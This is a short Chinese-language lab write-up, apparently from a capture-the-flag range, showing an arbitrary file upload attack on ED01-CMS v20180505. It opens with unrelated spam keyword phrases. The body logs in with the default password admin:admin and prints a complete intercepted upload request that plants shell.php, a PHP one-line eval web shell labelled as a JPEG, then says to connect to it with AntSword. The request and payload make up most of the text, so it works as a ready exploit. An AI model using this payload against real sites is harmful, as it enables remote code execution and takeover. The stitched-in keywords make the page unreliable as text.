如何查询网站建设时间,做动画在线观看网站,100部禁用app,湖南长沙装修公司靶标介绍#xff1a;
ED01-CMS v20180505 存在任意文件上传漏洞 打开靶场#xff1a; 盲猜一波弱密码admin:admin就进去了。登录后在图中位置点击进行图片更新#xff0c;需要将密码等都写上 抓包将图片信息进行替换#xff0c;并修改文件名#xff1a;
POST /admin…靶标介绍
ED01-CMS v20180505 存在任意文件上传漏洞 打开靶场 盲猜一波弱密码admin:admin就进去了。登录后在图中位置点击进行图片更新需要将密码等都写上 抓包将图片信息进行替换并修改文件名
POST /admin/users.php?sourceedit_userid41 HTTP/1.1
Host: eci-2zeg2tuyogpxmwm9b9op.cloudeci1.ichunqiu.com
Content-Length: 1347
Cache-Control: max-age0
Upgrade-Insecure-Requests: 1
Origin: http://eci-2zeg2tuyogpxmwm9b9op.cloudeci1.ichunqiu.com
Content-Type: multipart/form-data; boundary----WebKitFormBoundarytvURtujfCTmeOmyA
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.69
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.9
Referer: http://eci-2zeg2tuyogpxmwm9b9op.cloudeci1.ichunqiu.com/admin/users.php?sourceedit_userid41
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q0.9,en;q0.8,en-GB;q0.7,en-US;q0.6
Cookie: PHPSESSIDopuds1itmvgqublp4qr0mivo76
Connection: close------WebKitFormBoundarytvURtujfCTmeOmyA
Content-Disposition: form-data; nameuser_id41
------WebKitFormBoundarytvURtujfCTmeOmyA
Content-Disposition: form-data; nameuser_unameadmin
------WebKitFormBoundarytvURtujfCTmeOmyA
Content-Disposition: form-data; nameuser_emailadminaaa.com
------WebKitFormBoundarytvURtujfCTmeOmyA
Content-Disposition: form-data; nameuser_pass1admin
------WebKitFormBoundarytvURtujfCTmeOmyA
Content-Disposition: form-data; nameuser_pass2admin
------WebKitFormBoundarytvURtujfCTmeOmyA
Content-Disposition: form-data; nameuser_fnameadmin
------WebKitFormBoundarytvURtujfCTmeOmyA
Content-Disposition: form-data; nameuser_lnameadmin
------WebKitFormBoundarytvURtujfCTmeOmyA
Content-Disposition: form-data; nameuser_imagenew
------WebKitFormBoundarytvURtujfCTmeOmyA
Content-Disposition: form-data; namenew_image; filenameshell.php
Content-Type: image/jpeg?php eval($_POST[cnm]);?
------WebKitFormBoundarytvURtujfCTmeOmyA
Content-Disposition: form-data; nameuser_roleAdministrator
------WebKitFormBoundarytvURtujfCTmeOmyA
Content-Disposition: form-data; nameuser_statusActive
------WebKitFormBoundarytvURtujfCTmeOmyA
Content-Disposition: form-data; nameupdateusersubmit------WebKitFormBoundarytvURtujfCTmeOmyA--
最后找到图片位置上蚁剑。